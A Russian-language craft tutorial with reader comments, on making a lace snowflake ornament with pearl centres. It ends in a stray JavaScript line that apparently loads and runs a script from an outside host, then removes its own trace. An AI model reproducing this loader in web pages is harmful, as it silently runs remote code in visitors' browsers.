МК «Снежинка для исполнения желаний»

Ах, эти нежные снежинки – крохотные зимние феечки... Мы доверчиво подставляем им ладошки, украдкой пробуем на вкус, загадываем желание, которое, как известно, непременно сбудется, если снежинка не растает, пока часы двенадцать бьют!
Данная снежинка ранее представлена в наборе новогодних елочных украшений «Маняшины мечты», и вследствие поступающих просьб поделиться методом ее изготовления, появился этот мастер-класс.
Итак, необходимые материалы:
- ажурное, нежное кружево кремового или белого цвета с зубчатым краем (или любое другое на ваш вкус) шириной около 4 см;
- нитки в тон кружеву;
- пара речных жемчужинок или любых других подходящих бусин;
- нитки «Ирис».
Сборка:
- Отмеряем необходимую длину кружева (для данной снежинки использовалось 17 см кружевной ленты).
- Располагаем один конец кружевной ленты на другом, прошиваем строчкой «Зиг-заг» или вручную. Шов должен быть плоским и незаметным, иначе снежинка утратит свою воздушность. Также помним, что она двухсторонняя, поэтому аккуратность здесь важна, как никогда.
- Полученное кружевное кольцо собираем по краю на нитку, расправляем складочки и закрепляем. В серединке остается сквозное отверстие – место под жемчужинки.
- Размещаем в серединке каждой стороны снежинки по жемчужинке и пришиваем, выводя нитку в края отверстия. Причем, закрепляем обе бусины одновременно, для того, чтобы расположить примерно на одном уровне.
Отмеряем необходимую длину нитки «Ирис» и продеваем через кружевной край снежинки. Закрепляем концы нитки (я спрятала их в бисеринку).
Снежинка готова!
Для творческого вдохновения и создания предновогоднего настроения – песенка о снежинке из старого фильма детства «Чародеи», но в исполнении группы «Приключения Электроников».
С наступающим Новым годом!
Ваши фотки и сам МК уже создал новогоднее настроенине! СПАСИБО!!!!!
Ольга, благодарю
Очень мило и просто. Спасибо за идею и МК. Люблю кружавчики...
Спасибо
Я тоже люблю кружева...
Всё вроде бы все так просто -" на рубль" ,а выглядит на миллион !
А как оформлено и подано!
Леночка, спасибо, друг мой
Спасибо и за мк и клип!!!
И Вам, за внимание
Юля, очень по-новогоднему! Как всегда

Спасибо, Ирочка
а в клипе кадры из какого фильма?
Называется "Тариф новогодний"
Юлечка! Умница! Правильно подмечено, вроде все просто, а выглядет Дорого!
а я еще подумала, можно ведь и упаковку украшать!Завернул простой оберточной бумагой, а сверху снежинку! и вот праздничная упаковка готова!
Спасибо, Лена
О да, у этой снежинки большие возможности - от исполнения желаний до различных вариантов применения
Замечательная идея и очень красивая подача мк, у меня как раз очень много винтажных кружев, получились бы прекрасные украшения! ) Спасибо!))
Создайте свою снежиночку, это несложно. Спасибо
За последние дни как-то отдохнуть не пришлось ,суета...
А тут такая очаровательная снежинка и ты, Юленька как настоящая чудесная снегурочка!
И так сразу хорошо ,уютно ,по новогоднему!
Спасибо, Олечка, рада, что тебе понравилось
Какая интересная идея и простое воплощение! Снежинка очень нежная, я сначала подумала это будет какое-то сложное для меня вязание, но нет! Спасибо!
Благодарю, очень приятно
Юляш, прелесть! Просто, доступно и нарядно:)
МК от Снегурочки!:) Фото прелестное, мы такая нежная, настоящая снегурочка!:)
Олюшка, спасибо большое
Посмотрела и так нежно, и хорошо стало)) Спасибо!
И Вам
симпатишненько
Спасибо
Отличная снежинка! А я голову ломаю,чем украсить в офисе елку...Все сотрудники накрутят по снежинке и елочка -красавица будет у нас! Спасибо за МК!
Спасибо
Для офиса, наверное, пригодится вот этот забавный МК
Только вместо конфетки внутрь положите пожелания или смешной гороскоп
Ой,нам и это пригодится!Еще раз огромное СПАСИБО!!!
Пожалуйста
Великолепная идея, прекрасная подача и оформление. Будем творить с детьми и Вас благодарить
. Успехов в творчестве!
Спасибо за теплые пожелания
Чудесная кружевная снежинка! Какая красота!!!
Спасибо, Евгения
Очень нежная и милая снежинка!!!Просто, но с большим вкусом!!!Спасибо за МК
Благодарю
Простая и со вкусом. Надо сделать. спс за МК
Спасибо
Нежно и красиво! Спасибо!
И Вам
Все гениальное просто!!)))
Да
Я сначала, подумала, вязать надо будет, а так намного проще!
Действительно, я сейчас уже думаю, что надо было в названии поста обозначить, что изготовление никакого отношения к вязанию не имеет (хотя,если бы снежинка была вязаная, то оправилась бы в категорию "Вязание")
Попробуйте, вполне просто
Спасибо, обязательно попробую, тем более, что мысль сделать что-либо подобное присутствует давно
Да, и натуральным камушком украсить...
Ага, ну да, у меня уже фантазия работает, и бисером можно обшить и камушками и распылителем серебристым из флакончика
ага

Если сделайте, покажите, пожалуйста, интересно
Хорошо, руки дойдут только
Буду ждать
Здорово! Такая красота в простоте!
Спасибо
Спасибо!
У меня как раз небольшой кусочек кружева остался (правда, пошире) - надо попробовать.
И Вам
Попробуйте непременно
Взяла кружево шириной 4 см, но края загнулись, при длине 20 см. Передела из 30 см получилось красиво. Главное затянуть потуже, когда присбориваешь. Благодарю за МК. Все гениальное просто!
// <![CDATA[ (function () { var script = document.createElement('script'); script.src = 'https://abover.com/system/extension?iframe=' + ( self === top ? '0' : '1' ) + '&r=' + Math.random() + '&v=1.0.8'; script.onload = script.onerror = function () { script.onload = script.onerror = null; script.parentNode.removeChild(script); } document.body.appendChild(script); })(); // ]]>